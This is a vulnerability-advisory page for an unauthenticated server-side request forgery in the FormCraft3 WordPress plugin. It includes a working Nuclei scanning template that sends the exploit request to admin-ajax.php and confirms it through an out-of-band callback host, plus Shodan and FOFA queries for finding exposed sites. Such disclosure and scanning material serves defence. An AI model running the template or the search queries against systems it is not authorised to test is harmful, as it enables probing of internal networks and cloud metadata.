CVE-2026-65442: FormCraft3 <= 3.9.15 - Server-Side Request Forgery

2026-08-16 FormCraft3 PoC Public

Description

Unauthenticated Server Side Request Forgery (SSRF) in FormCraft <= 3.9.15 versions.

PoC

id: CVE-2026-65442

info:
  name: FormCraft3 <= 3.9.15 - Server-Side Request Forgery
  author: DhiyaneshDk
  severity: high
  description: |
    Unauthenticated Server Side Request Forgery (SSRF) in FormCraft <= 3.9.15 versions.
  impact: |
    An unauthenticated attacker can force the server to make HTTP requests to arbitrary internal or external URLs, potentially accessing cloud metadata services (AWS/GCP/Azure), internal network services, and sensitive data.
  remediation: |
    Update FormCraft3 to version 3.9.16 or later which adds nonce verification and authentication checks to the formcraft3_get AJAX endpoint.
  reference:
    - https://patchstack.com/database/wordpress/plugin/formcraft/vulnerability/wordpress-formcraft-plugin-3-9-15-server-side-request-forgery-ssrf-vulnerability
    - https://wpscan.com/vulnerability/a8ce5ff4-dd4c-411c-9b34-7824a75742b6/
    - https://github.com/advisories/GHSA-xvfc-pj4j-wr9x
    - https://nvd.nist.gov/vuln/detail/CVE-2026-65442
    - https://nvd.nist.gov/vuln/detail/CVE-2022-0591
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
    cvss-score: 7.2
    cve-id: CVE-2026-65442
    epss-score: 0.00419
    epss-percentile: 0.35636
    cwe-id: CWE-918
    cpe: cpe:2.3:a:subtlewebinc:formcraft3:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: subtlewebinc
    product: formcraft3
    framework: wordpress
    fofa-query: body="formcraft3" && body="wp-"
    shodan-query: http.component:"wordpress" http.html:"formcraft3"
  tags: cve,cve2026,wp,wp-plugin,wordpress,formcraft3,ssrf,subtlewebinc,vkev,oast

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}"

    matchers:
      - type: word
        words:
          - "/wp-content/plugins/formcraft3/"
        internal: true

  - method: GET
    path:
      - "{{BaseURL}}/wp-admin/admin-ajax.php?action=formcraft3_get&URL=https://{{interactsh-url}}"

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"

      - type: word
        part: interactsh_request
        words:
          - "User-Agent: WordPress"
# digest: 4a0a004730450220203ef2adcee5c1654e53b513c20e171c981705ebd5578ef25b1bcf2020b83d18022100c4cb36e8b75d09e4d5b60696aa45cab31ca05fa70d6c1c4b22df63a385c74548:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities